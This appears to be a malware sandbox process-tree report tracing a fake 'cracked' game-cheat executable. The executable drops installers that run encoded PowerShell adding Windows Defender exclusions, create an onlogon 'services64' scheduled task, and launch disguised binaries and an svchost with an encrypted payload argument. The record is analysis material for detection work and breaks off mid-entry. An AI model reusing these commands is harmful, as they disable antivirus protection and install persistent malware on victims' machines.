C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5840 /prefetch:13⤵PID:4892
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3204 /prefetch:13⤵PID:4904
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6240 /prefetch:83⤵PID:4988
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5828 /prefetch:83⤵PID:5016
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6716 /prefetch:83⤵PID:5028
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6584 /prefetch:83⤵PID:5056
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4280 /prefetch:13⤵PID:1960
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6508 /prefetch:83⤵PID:4112
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6488 /prefetch:23⤵
- Suspicious behavior: EnumeratesProcesses
PID:4220
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4968 /prefetch:13⤵PID:4284
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4320 /prefetch:83⤵PID:4432
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4056 /prefetch:13⤵PID:4404
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4864 /prefetch:83⤵PID:4860
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5944 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:4168
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6708 /prefetch:83⤵PID:2236
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3420 /prefetch:83⤵PID:3572
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4848 /prefetch:83⤵PID:4156
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4248 /prefetch:83⤵PID:2420
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4180 /prefetch:83⤵PID:5056
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2164 /prefetch:83⤵PID:4236
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5812 /prefetch:83⤵PID:2180
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4780 /prefetch:13⤵PID:4676
-
-
C:\Windows\system32\control.exe"C:\Windows\system32\control.exe" /name Microsoft.DateAndTime3⤵
- Modifies registry class
PID:4280 -
C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Windows\System32\shell32.dll,Control_RunDLL C:\Windows\System32\timedate.cpl4⤵PID:5032
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6556 /prefetch:83⤵PID:4744
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6672 /prefetch:13⤵PID:4168
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5960 /prefetch:83⤵PID:3572
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6672 /prefetch:13⤵PID:4780
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6204 /prefetch:83⤵PID:4964
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5576 /prefetch:13⤵PID:3632
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6056 /prefetch:13⤵PID:4144
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4312 /prefetch:13⤵PID:4636
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:13⤵PID:4624
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6220 /prefetch:13⤵PID:3316
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6616 /prefetch:13⤵PID:5100
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6668 /prefetch:13⤵PID:4696
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6068 /prefetch:13⤵PID:4660
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4728 /prefetch:13⤵PID:2924
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6760 /prefetch:83⤵PID:2548
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6220 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:3476
-
-
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\interium.ooo\" -spe -an -ai#7zMap28765:86:7zEvent126002⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3048
-
-
C:\Users\Admin\Downloads\interium.ooo\interium.ooo cracked 06.02.2022.exe"C:\Users\Admin\Downloads\interium.ooo\interium.ooo cracked 06.02.2022.exe"2⤵
- Executes dropped EXE
PID:2756 -
C:\Users\Admin\AppData\Local\Temp\CHROME_SETUP\installer.exe"C:\Users\Admin\AppData\Local\Temp\CHROME_SETUP\installer.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3800 -
C:\Windows\SYSTEM32\cmd.exe"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit4⤵PID:4292
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4348
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4668
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\Microsoft\services64.exe"4⤵PID:4140
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\Microsoft\services64.exe"5⤵
- Creates scheduled task(s)
PID:4160
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" cmd /c "C:\Users\Admin\Microsoft\services64.exe"4⤵PID:4468
-
C:\Users\Admin\Microsoft\services64.exeC:\Users\Admin\Microsoft\services64.exe5⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:4236 -
C:\Windows\system32\cmd.exe"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit6⤵PID:4800
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4848
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="7⤵
- Suspicious behavior: EnumeratesProcesses
PID:5056
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe"6⤵
- Executes dropped EXE
PID:2812 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "nwsxnhxvsavxvk"7⤵PID:2308
-
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe soudsldjmxipwx0 Xji3FXYfqqI2timPThbgZueMNpSES88mLhMz2ywydJRha9S4YJkR8/KlqFio/vzAY7y//ZROYnArPXLiffwPB3EYEaWtdTNgeO+yOcML2FLdin0Rbrrbm/YoAjK7mqvZEX/HgK//sgsnHcQsRkM9iGKCen+11TiuyHWyZAdf1wMLE4agYXDET+uLyuqzRfvjrbqdOzrMw7uyk9GJnctDF8x49xwghsNTxALZT8Q9OM4wOBYwE039IMn9ca6XIbih8DBlJp+5PtGkxeAUOlQZD9NIFcSIL8QxWvKL0CdDVUyrQGJuPIZE+rVtk06/lQa+6⤵PID:4260
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\CHROME_SETUP\45325325354235.exe"C:\Users\Admin\AppData\Local\Temp\CHROME_SETUP\45325325354235.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3524
-
-
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\interium.ooo\how to use.txt2⤵
- Opens file in notepad (likely ransom note)
PID:4044
-
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\interium.ooo\DLL НЕ ИНЖЕКТИТЬ.txt2⤵
- Opens file in notepad (likely ransom note)
PID:4236
-
-
C:\Users\Admin\Downloads\ILSpy_binaries_7.2.0.6839-preview4\ILSpy.exe"C:\Users\Admin\Downloads\ILSpy_binaries_7.2.0.6839-preview4\ILSpy.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4732
-
-
C:\Windows\system32\SystemSettingsAdminFlows.exe"C:\Windows\system32\SystemSettingsAdminFlows.exe" SetInternetTime 02⤵PID:2824
-
-
C:\Windows\system32\SystemSettingsAdminFlows.exe"C:\Windows\system32\SystemSettingsAdminFlows.exe" SetInternetTime 12⤵PID:2828
-
-
C:\Windows\system32\SystemSettingsAdminFlows.exe"C:\Windows\system32\SystemSettingsAdminFlows.exe" SetInternetTime 02⤵PID:5112
-
-
C:\Windows\system32\SystemSettingsAdminFlows.exe"C:\Windows\system32\SystemSettingsAdminFlows.exe" SetDateTime2⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:3928
-
-
C:\Windows\system32\SystemSettingsAdminFlows.exe"C:\Windows\system32\SystemSettingsAdminFlows.exe" SetDateTime2⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:4544
-
-
C:\Users\Admin\Downloads\dnSpy-net-win64\dnSpy.exe"C:\Users\Admin\Downloads\dnSpy-net-win64\dnSpy.exe"2⤵PID:4500
-
-
C:\Users\Admin\Downloads\interium.ooo\interium.ooo cracked 06.02.2022.exe"C:\Users\Admin\Downloads\interium.ooo\interium.ooo cracked 06.02.2022.exe"2⤵
- Executes dropped EXE
PID:660 -
C:\Users\Admin\AppData\Local\Temp\CHROME_SETUP\installer.exe"C:\Users\Admin\AppData\Local\Temp\CHROME_SETUP\installer.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3872 -
C:\Windows\SYSTEM32\cmd.exe"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit4⤵PID:1140
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"5⤵
- Suspicious behavior: EnumeratesProcesses
PID:4632
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="5⤵
- Suspicious behavior: EnumeratesProcesses
PID:4544
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" cmd /c taskkill /f /PID "2308"4⤵PID:4564
-
C:\Windows\system32\taskkill.exetaskkill /f /PID "2308"5⤵
- Kills process with taskkill
PID:3984
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\Microsoft\services64.exe"4⤵PID:4320
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\Microsoft\services64.exe"5⤵
- Creates scheduled task(s)
PID:2828
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" cmd /c "C:\Users\Admin\Microsoft\services64.exe"4⤵PID:2824
-
C:\Users\Admin\Microsoft\services64.exeC:\Users\Admin\Microsoft\services64.exe5⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5100 -
C:\Windows\system32\cmd.exe"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit6⤵PID:2244
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"7⤵
- Suspicious behavior: EnumeratesProcesses
PID:4724
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="7⤵PID:4544
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe"6⤵
- Executes dropped EXE
PID:1052 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "nwsxnhxvsavxvk"7⤵PID:5028
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\CHROME_SETUP\45325325354235.exe"C:\Users\Admin\AppData\Local\Temp\CHROME_SETUP\45325325354235.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4772
-
-
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\interium.ooo\DLL НЕ ИНЖЕКТИТЬ.txt2⤵
- Opens file in notepad (likely ransom note)
PID:4040
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /72⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SendNotifyMessage
PID:4592
-
-
C:\Users\Admin\Downloads\interium.ooo\interium.ooo cracked 06.02.2022.exe"C:\Users\Admin\Downloads\interium.ooo\interium.ooo cracked 06.02.2022.exe"2⤵
- Executes dropped EXE
PID:4516 -
C:\Users\Admin\AppData\Local\Temp\CHROME_SETUP\installer.exe"C:\Users\Admin\AppData\Local\Temp\CHROME_SETUP\installer.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
